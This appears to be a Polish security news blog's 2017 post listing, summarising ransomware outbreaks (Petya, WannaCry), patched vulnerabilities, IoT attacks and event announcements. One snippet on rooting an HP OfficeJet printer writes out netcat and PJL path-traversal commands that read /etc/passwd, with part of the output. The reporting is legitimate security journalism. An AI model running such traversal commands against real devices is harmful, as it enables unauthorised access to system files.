Microsoft niedawno załatał kolejną podatność w Windows Defenderze, która umożliwiała wykonanie kodu na systemie ofiary. Wystarczyło przesłać exploita np. mailem i w przypadku real time protection Windows Defender automatycznie skanował podejrzaną binarkę. Podejrzana binarka z kolei wykorzystywała błąd w antymalware Microsoftu, dając pełną kontrolę nad atakowanym komputerem. Sam Microsoft opisuje to dość zgrabnie:…
Czytaj dalej »
Szczegółowy opis exploita na VMWare Workstation. Podatność umożliwiała wyskoczenie na shella z maszyny guest na maszynę główną. Dla tych, którzy nie lubią czytać – krótki filmik: –ms
Czytaj dalej »
Jeśli tylko widzisz taki ekran poniżej (infekcja ransomware Petya), wyłącz jak najszybciej komputer. Jest to proces szyfrowania Twoich plików, jeśli więc go przerwiesz, pliki powinny być bezpieczne (można je będzie odzyskać, podłączając w odpowiednio bezpieczny sposób dysk do innego komputera). Uwaga – nie włączaj ponownie swojego PC-ta z zainfekowanym dyskiem! –ms
Czytaj dalej »
Obecny globalny atak ransomware Petya wydaje się zdecydowanie bardziej zjadliwy niż Wanacry. Przejmowane są systemy w najróżniejszych branżach, a właśnie doniesiono o zainfekowaniu systemu monitorowania promieniowania w elektrowni atomowej w Czarnobylu. Władze zostały zmuszone do przejścia na monitorowanie ręczne: Systems usually used to monitor the area around the power station –…
Czytaj dalej »
Niemal wszyscy piszą o zmasowanym ataku na instytucje w całej Europie – choć na razie przede wszystkim na Ukrainie: organizacje rządowe, banki, instytucje z sektora energetycznego, telkomy – to tylko kilka przykładów. Efekt infekcji wygląda mniej więcej tak: Na razie trwają analizy, ale wygląda że jest to nowa odmiana…
Czytaj dalej »
Jeśli ktoś chce od razu popraktykować szukanie podatności – polecam zerknąć tutaj. Więcej teoretycznych przemyśleń tu. Z kolei konkretna dokumentacja jak dobezpieczyć AWS-a – tutaj. –ms
Czytaj dalej »
Całość w szczegółowej izraelsko-kandyjskiej pracy zatytułowanej: „IoT Goes Nuclear: Creating a ZigBee Chain Reaction„. W dużym skrócie akcja wykorzystuje bezprzewodowy protokół komunikacyjny ZigBee, chętnie wykorzystywany przez rozmaite urządzenia IoT. Jako Proof of Concept użyto inteligentnych żarówek (Phillips HUE): Jak można wystartować atak? Wystarczy wkręcić gdzieś jedną zainfekowaną żarówkę…: The attack…
Czytaj dalej »
Chodzi o słynny WannaCry. Incydent dotyczy Australii, kontrolę utracono nad 55 urządzeniami służącymi do mierzenia prędkości samochodów a także moniotorowania przejazdów na czerwonym świetle. W jaki sposób doszło do infekcji? Najprawdopodobniej ransomware dostał się poprzez zainfekowany komputer i/lub nośnik USB, użyty przez technika robiącego okresowy przegląd infrastruktury. Finalnie unieważniono 590…
Czytaj dalej »
Jeszcze niepublikowany research można będzie zobaczyć na żywo już w ten poniedziałek. Miejsce: Warszawa, Aula Główna PJATK, Start: godzina 18:00 – prezentacja około 45 minut. Pokażę jedną kamerę, którą można było oglądnąć na ostatniej mojej prelekcji w PJATK + dwie zupełnie nowe. Wstęp wolny, formalnych zapisów nie ma. Warto być chwilę…
Czytaj dalej »
Amerykański Sąd Najwyższy (Supreme Court) właśnie wydał wyrok, w którym orzekł, że nie można karać zakazem dostępu do Internetu, i nie ma tu znaczenia jakie przestępstwa się popełniło. W konkretnej sprawie, która była omawiana chodziło zakaz dostępu do konkretnych serwisów: By prohibiting sex offenders from using those websites, North Carolina…
Czytaj dalej »
Dość dokładny opis rootowania drukarki HP OfficeJet Pro 8210. Rozmowa odbywała się protokołem PJL. Od zwykłego odpytania o nazwę drukarki: albinolobster@ubuntu:~$ nc 192.168.1.159 9100 @PJL INFO ID @PJL INFO ID „HP OfficeJet Pro 8210″ przez Path Traversal: @PJL FSUPLOAD NAME=”../../etc/passwd” OFFSET=0 SIZE=648 @PJL FSUPLOAD FORMAT:BINARY NAME=”../../etc/passwd” OFFSET=0 SIZE=648 root:x:0:0:root:/var/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh…
Czytaj dalej »
Jak donosi BBC, James Ejankowski wydał wykradzione środki na BMW, Range Rovera i tatuaże na swojej twarzy. Wykorzystany problem został już załatany, a polegał na możliwości przelewu pieniędzy na własne konto oszczędnościowe z konta, na którym nie istniały żadne środki… Co ciekawe operacja możliwa była tylko w przedziale godzinowym 0:00 – 1:00:…
Czytaj dalej »
Artykuły wiodące czerwcowego wydania „Linux Magazine” opisują przydatne narzędzia: Zim – wieloplatformowe wiki działające na pulpicie, nowy pakiet biurowy OnlyOffice Desktop Editor, rozwiązanie do samoorganizacji Getting Things Gnome i SeaMonkey Internet Suite do lekkiego przeglądania Sieci. Na dołączonym DVD znajduje się Megapak Ubuntu 17.04: Ubuntu 17.04 – Kubuntu 17.04 –…
Czytaj dalej »
7 przystępnych lekcji, zaczynając od zupełnych podstaw. Na pewno przyda się fanom analizy odwrotnej IoT. Tutaj polecamy też wspominany przez nas jakiś czas temu online-owy dezasembler (działa dla platform: ARM/MIPS/i386/…). –ms
Czytaj dalej »
Zapraszamy do zerknięcia na program tegorocznej wrocławskiej konferencji https://techrisk.pl/ Sami organizatorzy piszą tak: Zapraszamy na TechRisk 2017 – jedyną w Polsce konferencję poświęconą wyłącznie tematyce ryzyka technologicznego! Wielu firmom wydaje się, że w obszarze bezpieczeństwa technologicznego robią wszystko zgodnie ze sztuką, nie zauważając, że to właśnie sztuka się zmieniła. Budżety na…
Czytaj dalej »